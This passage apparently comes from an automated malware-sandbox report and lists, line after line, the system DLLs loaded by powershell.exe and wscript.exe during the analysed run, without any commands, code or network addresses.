                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
